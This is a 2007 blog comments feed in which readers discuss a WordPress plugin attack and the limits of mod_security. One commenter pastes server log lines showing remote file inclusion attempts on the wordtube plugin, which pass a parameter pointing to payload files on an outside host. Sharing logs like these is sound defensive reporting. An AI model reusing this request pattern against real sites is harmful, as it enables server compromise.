Comments on: Blog Under Siege http://blogsecurity.net/wordpress/article-030707 Always something worth reading... Fri, 12 Mar 2010 11:09:45 +0000 http://wordpress.org/?v= hourly 1 By: Stefan Esser http://blogsecurity.net/wordpress/article-030707/comment-page-1#comment-247 Stefan Esser Wed, 04 Jul 2007 07:51:24 +0000 http://blogsecurity.net/?p=35#comment-247 Daniel, I hope you do not believe that mod_security protects you against attacks. It just protects you against the dumb worms... Daniel,

I hope you do not believe that mod_security protects you against attacks. It just protects you against the dumb worms…

]]> By: David Kierznowski http://blogsecurity.net/wordpress/article-030707/comment-page-1#comment-246 David Kierznowski Wed, 04 Jul 2007 07:08:15 +0000 http://blogsecurity.net/?p=35#comment-246 Daniel, mod_security can be really useful if the user knows how to set it up and assuming their blog is not hosted. Daniel, mod_security can be really useful if the user knows how to set it up and assuming their blog is not hosted.

]]> By: Daniel http://blogsecurity.net/wordpress/article-030707/comment-page-1#comment-245 Daniel Wed, 04 Jul 2007 06:30:18 +0000 http://blogsecurity.net/?p=35#comment-245 Another reason why mod_security is so sexy running alongside code which has been developed with security last in the process. When will these people learn about SDLC? Another reason why mod_security is so sexy running alongside code which has been developed with security last in the process. When will these people learn about SDLC?

]]> By: David Kierznowski http://blogsecurity.net/wordpress/article-030707/comment-page-1#comment-244 David Kierznowski Tue, 03 Jul 2007 20:25:45 +0000 http://blogsecurity.net/?p=35#comment-244 Nick, fixed :) To be honest, I think this is one of the more popular WordPress exploits, I have seen it in my logs before. Nick, fixed :)

To be honest, I think this is one of the more popular WordPress exploits, I have seen it in my logs before.

]]> By: Nick http://blogsecurity.net/wordpress/article-030707/comment-page-1#comment-243 Nick Tue, 03 Jul 2007 19:41:13 +0000 http://blogsecurity.net/?p=35#comment-243 oops sorrry, looks like the [code] tag doesn't wrap properly. oops sorrry, looks like the [code] tag doesn't wrap properly.

]]> By: Nick http://blogsecurity.net/wordpress/article-030707/comment-page-1#comment-242 Nick Tue, 03 Jul 2007 19:39:19 +0000 http://blogsecurity.net/?p=35#comment-242 It must be hack wordtube day.. look what I found :( <code> 75.126.70.242 - - [02/Jul/2007:18:53:54 +0100] "GET /wp-content/wp-content/plugins/wordtube/wordtube-button.php? wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805" 75.126.70.242 - - [02/Jul/2007:18:53:54 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php? wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805" 66.230.197.155 - - [03/Jul/2007:04:05:13 +0100] "GET /wp-content/wp-content/plugins/wordtube/wordtube-button.php? wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4586 "-" "libwww-perl/5.805" 66.230.197.155 - - [03/Jul/2007:04:05:14 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php? wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805" 204.15.10.144 - - [03/Jul/2007:04:07:18 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php? wpPATH=http://www.securityjobs.us/xpl/meks.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.79" </code> luckily I don't have wordtube installed :) It must be hack wordtube day.. look what I found :(


75.126.70.242 - - [02/Jul/2007:18:53:54 +0100] "GET /wp-content/wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
75.126.70.242 - - [02/Jul/2007:18:53:54 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
66.230.197.155 - - [03/Jul/2007:04:05:13 +0100] "GET /wp-content/wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4586 "-" "libwww-perl/5.805"
66.230.197.155 - - [03/Jul/2007:04:05:14 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
204.15.10.144 - - [03/Jul/2007:04:07:18 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://www.securityjobs.us/xpl/meks.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.79"

luckily I don’t have wordtube installed :)

]]>